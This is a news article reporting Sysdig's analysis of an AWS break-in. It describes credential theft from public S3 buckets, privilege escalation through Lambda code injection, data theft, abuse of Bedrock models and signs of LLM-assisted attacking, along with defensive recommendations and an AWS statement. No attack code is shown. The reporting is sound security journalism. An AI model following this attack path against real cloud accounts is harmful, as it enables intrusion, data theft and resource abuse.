UPDATED A digital intruder broke into an AWS cloud environment and in just under 10 minutes went from initial access to administrative privileges, thanks to an AI speed assist.
The Sysdig Threat Research Team said they observed the break-in on November 28, and noted it stood out not only for its speed, but also for the “multiple indicators” suggesting the criminals used large language models to automate most phases of the attack, from reconnaissance and privilege escalation to lateral movement, malicious code writing, and LLMjacking – using a compromised cloud account to access cloud-hosted LLMs.
“The threat actor achieved administrative privileges in under 10 minutes, compromised 19 distinct AWS principals, and abused both Bedrock models and GPU compute resources,” Sysdig’s threat research director Michael Clark and researcher Alessandro Brucato said in a blog post about the cloud intrusion. “The LLM-generated code with Serbian comments, hallucinated AWS account IDs, and non-existent GitHub repository references all point to AI-assisted offensive operations.”
The attackers initially gained access by stealing valid test credentials from public Amazon S3 buckets. The credentials belonged to an identity and access management (IAM) user with multiple read and write permissions on AWS Lambda and restricted permissions on AWS Bedrock. Plus, the S3 bucket also contained Retrieval-Augmented Generation (RAG) data for AI models, which would come in handy later during the attack.
To prevent this type of credential theft, don’t leave access keys in public buckets. Sysdig recommends using temporary credentials for IAM roles, and for organizations that insist on granting long-term credentials to IAM users, make sure you rotate them periodically.
After unsuccessfully trying usernames such as “sysadmin” and “netadmin” typically associated with admin-level privileges, the attacker ultimately achieved privilege escalation through Lambda function code injection, abusing the compromised user’s UpdateFunctionCode and UpdateFunctionConfiguration permissions:
The security sleuths note that the comments in the code are written in Serbian – likely indicating the intruder’s origin – the code itself listed all IAM users and their access keys, created access keys for frick, and listed S3 buckets along with their content.
Code writing for LLMs 101
Plus, the attacker’s code contained “comprehensive” exception handling, according to the security sleuths, including logic to limit S3 bucket listings and an increase to the Lambda execution timeout from three seconds to 30 seconds.
These factors, combined with the short time from credential theft to Lambda execution, “strongly suggest” the code was written by an LLM, according to the threat hunters.
Next, the miscreant set about collecting account IDs and attempting to assume OrganizationAccountAccessRole in all AWS environments. Interestingly, they included account IDs that did not belong to the victim organization: two with ascending and descending digits (123456789012 and 210987654321), and one ID that appeared to belong to a legitimate external account.
“This behavior is consistent with patterns often attributed to AI hallucinations, providing further potential evidence of LLM-assisted activity,” Clark and Brucato wrote.
In total, the attacker gained access to 19 AWS identities, including six different IAM roles across 14 sessions, plus five other IAM users. And then, with the new admin user account they had created, the crims snarfed up a ton of sensitive data: secrets from Secrets Manager, SSM parameters from EC2 Systems Manager, CloudWatch logs, Lambda function source code, internal data from S3 buckets, and CloudTrail events.
LLMjacking attacks
They then turned to the LLMjacking part of the attack to gain access to the victim’s cloud-hosted LLMs. For this, they abused the user’s Amazon Bedrock access to invoke multiple models including Claude, DeepSeek, Llama, Amazon Nova Premier, Amazon Titan Image Generator, and Cohere Embed.
Sysdig notes that “invoking Bedrock models that no one in the account uses is a red flag,” and enterprises can create Service Control Policies (SCPs) to allow only certain models to be invoked.
After Bedrock, the intruder focused on EC2, querying machine images suitable for deep learning applications. They also began using the victim’s S3 bucket for storage, and one of the scripts stored therein looks like it was designed for ML training – but it uses a GitHub repository that doesn’t exist, suggesting an LLM hallucinated the repo in generating the code.
While the researchers say they can’t determine the attacker’s goal – possibly model training or reselling compute access – they note that the script launches a publicly accessible JupyterLab server on port 8888, providing a backdoor to the instance that doesn’t require AWS credentials.
However, they terminated the instance after five minutes for unknown reasons.
This is the latest in examples of attackers increasingly relying on AI to help them at almost every stage in the attack chain, and some security chiefs have warned that it’s just a matter of time before criminals can fully automate attacks at scale.
There are things organizations can do to defend against similar intrusions and most involve hardening identity security and access management. First off: apply principles of least privilege to all IAM users and roles.
Sysdig also recommends restricting UpdateFunctionConfiguration and PassRole permission in Lambda, limiting UpdateFunctionCode permissions to specific functions and assigning them only to identities that need code deployment capabilities to do their jobs.
Also, make sure S3 buckets containing sensitive data, including RAG data and AI model artifacts, are not publicly accessible.
And it’s a good idea to enable model invocation logging for Amazon Bedrock to detect unauthorized usage.
We reached out to Amazon for comment, but they said they wouldn’t be able to get us anything by publication time. We’ll update this story with any relevant information we receive from them. ®
UPDATED AT 02:30 UTC, February 5
to add the following comment sent by AWS.
“AWS services and infrastructure are not affected by this issue, and they operated as designed throughout the incident described,” the company told The Reg by email. “The report describes an account compromised through misconfigured S3 buckets. We recommend all customers secure their cloud resources by following security, identity, and compliance best practices, including never opening up public access to S3 buckets or any storage service, least-privilege access, secure credential management, and enabling monitoring services like GuardDuty, to reduce risks of unauthorized activity.”
The cloud giant also wants its customers who suspect or become aware of malicious activity within their AWS accounts to check out guidance for remediating potentially compromised credentials or contact AWS Support for assistance.”